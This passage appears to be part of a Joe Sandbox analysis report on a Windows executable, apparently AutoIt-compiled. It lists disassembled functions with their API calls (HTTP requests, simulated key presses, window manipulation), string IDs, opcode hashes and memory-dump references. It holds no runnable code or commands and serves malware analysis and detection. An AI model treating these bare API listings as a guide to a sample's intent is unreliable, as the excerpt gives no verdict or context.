                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                          • Opcode ID: 05ab1cbfc6b7a600550f47482fc9076bcbc4d910cbc2eb4d293cb8fb3dba81fa
                                                                                                                                                                                                                                          • Instruction ID: 0c7f3a24c6f9381f89f98c457b310a58a7d28f402639e4e53af84c203a590fa3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ab1cbfc6b7a600550f47482fc9076bcbc4d910cbc2eb4d293cb8fb3dba81fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B771CB31500205EFCF298F64CD84AFA3BB6FF4A766F14427AED555A2A6C3309881DF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001435E4
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • LoadStringW.USER32(001A2390,?,00000FFF,?), ref: 0014360A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LoadString$_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                          • API String ID: 4099089115-2391861430
                                                                                                                                                                                                                                          • Opcode ID: 477bf130e2168ff52ce486fe1df4f97307b25728e1d0b84873511bf0e113e392
                                                                                                                                                                                                                                          • Instruction ID: 4bb920e58bfebb9250ee76a50710628740dcac2ca03af93c305c18f1cf5259a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 477bf130e2168ff52ce486fe1df4f97307b25728e1d0b84873511bf0e113e392
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D517F7190020ABBDF15EBE0DC42EEEBB78AF14350F144126F115722A2EB711B99DFA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00168B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetCursorPos.USER32(?), ref: 000E9141
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: ScreenToClient.USER32(00000000,?), ref: 000E915E
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000001), ref: 000E9183
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000002), ref: 000E919D
                                                                                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00168B6B
                                                                                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00168B71
                                                                                                                                                                                                                                          • ReleaseCapture.USER32 ref: 00168B77
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00168C12
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00168C25
                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00168CFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                          • Opcode ID: 0562c578c750f6dd59fa6262a706637b2e7ffc07838dd572204ccf77d0c564e0
                                                                                                                                                                                                                                          • Instruction ID: 6efb2541af49bd79e924675921abebad0f9598641cde24b461c6cde1b01e418b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0562c578c750f6dd59fa6262a706637b2e7ffc07838dd572204ccf77d0c564e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A516A74204300AFD704DF14DC56FAA77E4FB89714F400A2EF996A72E2DB709954CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0014C272
                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0014C29A
                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0014C2CA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0014C322
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0014C336
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0014C341
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                          • Opcode ID: c99de67c041f1699e75dfa42f4d11494495fc42492a6427775dd31f1c988261a
                                                                                                                                                                                                                                          • Instruction ID: 3b9a0c41b7763fc8cf02b7bf575ae3810548ea4aee5ff59e32ac6b473aa0b28e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c99de67c041f1699e75dfa42f4d11494495fc42492a6427775dd31f1c988261a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3319CB1601208AFD7619FA48C88ABB7BFCFB49744B14852EF48693620DB70DD449BE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00113AAF,?,?,Bad directive syntax error,0016CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001398BC
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00113AAF,?), ref: 001398C3
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00139987
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                          • Opcode ID: e0b147a817b9ccaab28ce8ae9ee537eb7a5c2b8f2a6bb62edeeaad9b2fde4712
                                                                                                                                                                                                                                          • Instruction ID: ff7a6ac61a9e8898407a15220d23e8f28503df4e4984a49f1243736cd6b7f223
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0b147a817b9ccaab28ce8ae9ee537eb7a5c2b8f2a6bb62edeeaad9b2fde4712
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1721AB3290030AEBCF15AF90CC06EFE7739BF18704F04442AF515721A2EB719A68DB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32 ref: 001320AB
                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 001320C0
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0013214D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                          • Opcode ID: 291f877d41749c07165ed36fe29430ff95ac7259950ea73e4e56e3f1e07281d7
                                                                                                                                                                                                                                          • Instruction ID: 49bb86d6243b598c5abd6e4231277daa9490730ad3a9f61fe31fb4d8e5cbd5cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 291f877d41749c07165ed36fe29430ff95ac7259950ea73e4e56e3f1e07281d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F11067668870AB9FB063220DC06DF7379DCB05324F210156FB05B54E2EBB168426658
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00108D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2ed99dc10aa7122907765c59725773ab5bd8ac24ad3556cd1cb498b3cd84dc25
                                                                                                                                                                                                                                          • Instruction ID: 23cc414b2cffb49ac607d11122f8a97257460778c26c6a3a85ad59062e81c5e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ed99dc10aa7122907765c59725773ab5bd8ac24ad3556cd1cb498b3cd84dc25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3C1E1B4A0824AAFDB11DFA8C855BBDBBB4BF19310F144199F594A73D3C7B09941CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1282221369-0
                                                                                                                                                                                                                                          • Opcode ID: 6f86703038ce52b4a63e1fc55ffcb436d7d3bbdcc142ef2fc6d6aef2939cb4ff
                                                                                                                                                                                                                                          • Instruction ID: 66bedd36ed40e0b2598152e1d6e6c66ce6359d638a16a643ce7ca527cf4a8be1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f86703038ce52b4a63e1fc55ffcb436d7d3bbdcc142ef2fc6d6aef2939cb4ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3616872904316AFDB22AFF49885A6E7BA5AF06310F14426DF9C4972C2D7B19D408BD1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00126890
                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001268A9
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001268B9
                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001268D1
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001268F2
                                                                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00126901
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0012691E
                                                                                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0012692D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1268354404-0
                                                                                                                                                                                                                                          • Opcode ID: a07a96a501d8d3c9835ee688f0033398aafbe461a54aa38ea5de26e2aae90cbf
                                                                                                                                                                                                                                          • Instruction ID: b2f8aa83010e15223433260c9d4f3a19c98d0887f37a8f0e355e104efffa887c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07a96a501d8d3c9835ee688f0033398aafbe461a54aa38ea5de26e2aae90cbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98518970600309EFDB20CF25DC55BAA7BB5FB58754F108518F956A72E0DBB0E9A0DB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0014C182
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0014C195
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0014C1A9
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0014C272
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: GetLastError.KERNEL32 ref: 0014C322
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: SetEvent.KERNEL32(?), ref: 0014C336
                                                                                                                                                                                                                                            • Part of subcall function 0014C253: InternetCloseHandle.WININET(00000000), ref: 0014C341
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                                                                                          • Opcode ID: b335c73b511d5fe5150c094bc5a9ebabb9059f66bfc45b64ec648ced667af780
                                                                                                                                                                                                                                          • Instruction ID: 1a3ef0b493138a7a73923b4f7c38daaee32a02b6578263408fb810cb93205fa0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b335c73b511d5fe5150c094bc5a9ebabb9059f66bfc45b64ec648ced667af780
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA318D71602641EFDB619FB5DD44A76BBF9FF18300B04442DF99A82A20D7B1E8549BE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 001325BD
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001325DB
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001325DF
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 001325E9
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00132601
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00132605
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0013260F
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00132623
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00132627
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                                                                                          • Opcode ID: 6aba4176c8577c6789c209e377ab1d01f9f553b7b8929fcc1fc9517543fc2d7a
                                                                                                                                                                                                                                          • Instruction ID: c03d1e8e899bae77c7b63ddd42778ff224f6eb882f92199e47344d172b6ffe9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aba4176c8577c6789c209e377ab1d01f9f553b7b8929fcc1fc9517543fc2d7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50018831790614BBFB107769DC8AFA93F59DF5EB51F100011F354AF1D1C9F164848AA9
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00131449,?,?,00000000), ref: 0013180C
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00131449,?,?,00000000), ref: 00131813
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00131449,?,?,00000000), ref: 00131828
